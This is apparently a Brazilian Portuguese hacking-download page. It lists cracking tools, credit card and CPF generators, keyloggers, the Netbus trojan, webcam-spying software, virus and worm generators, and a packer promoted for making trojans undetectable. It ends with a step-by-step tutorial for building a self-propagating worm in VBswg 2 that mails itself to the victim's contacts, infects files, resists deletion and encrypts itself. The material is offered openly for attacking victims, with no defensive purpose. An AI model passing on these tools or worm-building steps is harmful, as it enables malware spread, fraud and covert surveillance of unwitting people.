Cheack: Gerador de Numeros de Cartões de Credito: AMERICAN EXPRESS , VISA , MASTER CARD , DISCOVER

Geração: Gerador de Nome e data de Nascimento

RapidShare: Gerador de Contas do famoso RapidShare

GaradorEnd: Gerador de Endereço,Cep e nº do Apartamento

GaradorCart: Gerador de Cartões de Crédito

Programas Hackers em geral

PROGRAMAS HACKER EM GERAL

Super pacote com + de ferramentas Hacker

RapidBusca: É só vc digitar o nome e ele varre todo RapidShare !

ValidadorXp: Programa para registrar o seu Windows. 100%Brasileiro

BaixaTudo: Programa para baixar, parar e continuar dps Downloads do MegaUpload e
RapidShare e etc.

Localizador: Localizador de Cracks e Seriais, um dos Melhor !

Ardamax: Programa a Capturação de senha. Tutorial

Craagle: Baixe Cracks e Seriais com este super programa.Tutorial

XpValidator: Faça seu windowsXp ficar Original

Netbus 1.7: Infecte a máquina do seu amigo.

R3X: Um dos melhores e mais rápidos scanners já criados.

Rapidcheck: Gerador de senhas Premium

Zipcrk20.zip: Quebre as senhas de arquivos zipados.

Wfwcd.zip: Quebre senhas de arquivos do Word

Brutus Net: Muito util para descobrir senhas de emails

Gerador: Gera CPFs para usar em cadastramento

KeySpy: Poderoso programa de monitoramento e espionagem.

Anommail: Quer passar email sem ser identificado?

Password: Mostra para você a senha escondida por ***

MSExcel: Quebra senha de arquivos Excel.

ActiveWhois: Mostra dados de domínios próprios

Revelation: Revela senhas do tipo ******


Brutos Descobri Senhas


RAR Password Recovery 1.1 RC16 Recupere senhas perdidas para arquivos RAR e WinRAR

Proxy Switcher Pro 3.9.0 4059 Este programa gerencia configuraes de proxy


Themida Ferramenta para proteger arquivo , otimo para deichar virus ou trojan
indetectavel

Revelations Ferramenta para mostrar senhas tipo***

MessengerLog Pro 6.61 monitora tudo do MSN, incluindo os emoticons, as fontes e as cores

SpyOne v1.0 Beta SpyOne um backdoor criado por um hacker italiano chamado Ozores

Hack de Mu AutoKill+Hithack Para o xiter que jogo mu esse bom!

Msn kill Um programa que se a pessoa execulta no pc ,nunca mais conseguira entrar no seu msn

INV4S10N Webcam Spy Programa de abri webcam sem permisao da vitima


Assasin 2.0 Ferramenta para fazer virus .bat, tem varios modelos de virus vale conferir

Maquina hacker Programa para fzabricar virus bat ,muito bom mesmo

Fabrica de virus de um simples virus de abrir um programa ,at um de formatar o pc da vitima


Curso de Hacker Completo Com aulas ministradas por um professor da area!! O pacote conta com video-aulas, e-books, tutoriais


Evil MSN Com o Evil Msn voc turbina seu MSN com milhares de ferramentas


Messenger Detect 2.75 aplicativo que pode detectar e gravar todas as conversas do msn

Game CheatBook 2008 Dicas e cheats de mais de 14.200 jogos para voce arrebentar o score

Nsasoft SpotMSN 1.5 Nsasoft SpotMSN uma ferramenta de recuperao de senha de msn

Winspio 3.0.008 Poderoso software de monitoramento com ele vc tem relatorios html
Fotos protegidas do Orkut ! Ver fotos bloqueadas do orkut(muito bom)

Burlando o rapidishare Baixe no rapidishare sem o tempo de espera


Craagle, O Craagle um software tem a funçao de procurar por seriais

ECC 5.2 HACKER CS 1.6 Cheater (Xiter) Para Cs 1.6

Keygen Pack Pacote com mais de 100 keygens

Admin Password Hack muito util pra vc que esqueceu a senha de Adm do windows

Rar Password Remover remover password de arquivos rar

System Hacking 1 | 2 | 3 Mais um super pacote Hacker!!!

Worm Generator Pack Contem varios geradores de virus para iniciantes em hacking

Deixe seu Office Original Basta executar o arquivo .bat que vem no pacote


Livro Google Livro Google Hacking para Testes de Invasao

Apostilas

1000 Dicas Windows
3 Apostilas de Javascript
Apostila de Treinamento Avançado em Linux
Apostila Hacker para Iniciantes
Aprenda a Remover Vírus Sozinho
Barata Elétrica Vol. 4 Engenharia Social
Evil MSN
Exploit
Otimizando o XP
Otimizando o Windows XP
Plaquinha Mágica
Segredos Windows
Tuning
Vírus
Windows XP Otimizado

Apostila completa de Dreamweaver CS3 (100 Pág) Baixe

(Personalizando o Dreamweaver) Baixe

(Apostila completa de Dreamweaver 8 (62 Páginas) Baixe

(Apostila completa de Flash CS4 (100 Páginas) Baixe

(Apostila completa de Flash CS3 (51 Páginas) Baixe

(Apostila completa Flash 8 (58 Páginas) Baixe

(Apostila Completa de Delphi 6 (160 Pág.) Baixe

(Desenvolvimento de Sistemas Com Firebird) Baixe

(Apostila de Delphi) Baixe

Apostila dreamweaver

[Tutorial] Crie seu próprio Worm

Olá pessoal, nesse tutorial eu vou mostrar como criar um worm.
Usarei o VBswg 2, que pode ser baixado aqui!

Após ter feito o download, abra o programa...Será exibido um janela, nela clique em IAGREE:

Logo em seguia aparecerá o Splash screen do programa e depois o programa:

Agora com o programa aberto vamos configurar nome do worm, para onde ele vai ser copiado, qual sera a extenção e etc...
• Em Worm name vc bota o nome do seu worm.
• Em You name vc pode botar seu nome, apelido ou outra coisa...
• Em File name vc repete o nome do seu worm.
• Em Copy worm to vc bota o diretório para onde seu worm será copiado.
• Por ultimo vc escolhe e extenção do seu worm, veja a imagem:



Agora clique no botão Startup
Abrirá um janelinha, nessa janelinha marque a opção Start with windows e clique em Done. Isso serve para que seu worm se inicie junto com o windows:



Agora, clique em no botão E-mail que está ao lado do botão Startup. Aqui o Worm envia um e-mail para todos os contatos da vítima infectada, então fica a seu gosto a mensagen.



Em seguida clique em Done

Agora clique em Irc que fica ao lado do botão E-mail, nessa janela configure como a imagem!
Isso serve para infectar todos os arquivo do Mirc ( Se a vítima usar.) Clique em Done em seguida!
Clique agora em Infect quando a janelinha abrir, marque todas as opçoes e clique em Done. Essas opções servem para que quando o seu worm for executado, infecte todos os tipos de arquivos da vítima.



Clique agora em Payload, caso queira que o seu worm de uma mensagem, ou abra uma página na internet e etc... assim que for executado, marque a opção Use payload caso contrário clique em Done. Eu optei por exibir mensagem, abrir site e etc. Então vamos ver como fazer:

• Em Message vc bota a mensagem que será exibida assim que for executado.
• Em Tittle vc bota o título da sua mensagem.
• Em Picture vc bota o tipo de mensagem que será exibida.

Vamos à legenda da mensagem:

-» Critical - Exibe mensagem do Tipo Erro
-» Information - Exibe mensagem do tipo Informação
-» Question - Exibe mensagem do tipo Fazendo um pergunta
-» Alert - Exibe uma mensagem do tipo Alertendo

• Em Goto Url vc bota a página da web que será exibida assim que seu worm for executado.
• Em Shut down ele reinicia o PC assim que for executado.
• Em Random nem precisa mecher!
• Em Date é o dia que seu worm se manifestará



Agora clique em Extra e depois em Antideletion, será exibida uma janelinha, nela marque as 2 opções e clique em Done. Isso serve para que seu worm não seja deletado do PC da vítima.



Clique em Extra novamente e sem seguida clique em Encryption, quando a janela for exibida marque as opções Use encryption e Full code encryption em sequida clique em Done. Isso serve para encryptar seu worm.



Após ter clicado em Done clique em Generate



Após ter clicado em Generate, aparecerá a seguinte janela:



Então clique em I AGREE

Agora clique em Create:



Em seguida é só botar o nome do seu worm e salvar.



Após isso, será exibida a seguinte mensagem, de OK nela!